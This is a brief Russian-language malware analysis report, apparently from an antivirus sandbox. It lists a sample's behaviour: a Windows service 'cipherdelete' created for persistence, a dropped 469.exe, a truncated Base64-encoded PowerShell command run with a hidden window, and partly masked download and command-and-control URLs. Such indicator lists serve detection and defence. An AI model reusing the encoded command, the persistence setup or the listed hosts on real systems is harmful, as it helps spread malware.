Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\cipherdelete] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\cipherdelete] 'ImagePath' = '"%WINDIR%\SysWOW64\cipherdelete.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAGgAYQB1AGIAZQBtAGkAaQBkAGwAeQBiAD0AJwBBAHUAYwBhAHQAegBjAHcAJwA7ACQAVQBlAGcAYQBwAG0AcwBqAGMAIAA9ACAAJwA0ADYAOQAnADsAJABTAGcAagB1AHQAagBoAG8AZABiAHIAbwA9ACcAUQBkAGgAZABpAGYAZQBoAG0AbQB...
- %HOMEPATH%\469.exe
- %HOMEPATH%\469.exe в %WINDIR%\syswow64\cipherdelete.exe
- http://ma######n.feb.unair.ac.id/gcbme/SU5/
- http://74.###.125.192:443/raster/arizona/ringin/ via 74.##8.125.192
- DNS ASK ma######n.feb.unair.ac.id
- '%HOMEPATH%\469.exe'
- '%WINDIR%\syswow64\cipherdelete.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAGgAYQB1AGIAZQBtAGkAaQBkAGwAeQBiAD0AJwBBAHUAYwBhAHQAegBjAHcAJwA7ACQAVQBlAGcAYQBwAG0AcwBqAGMAIAA9ACAAJwA0ADYAOQAnADsAJABTAGcAagB1AHQAagBoAG8AZABiAHIAbwA9ACcAUQBkAGgAZABpAGYAZQBoAG0AbQB...' (со скрытым окном)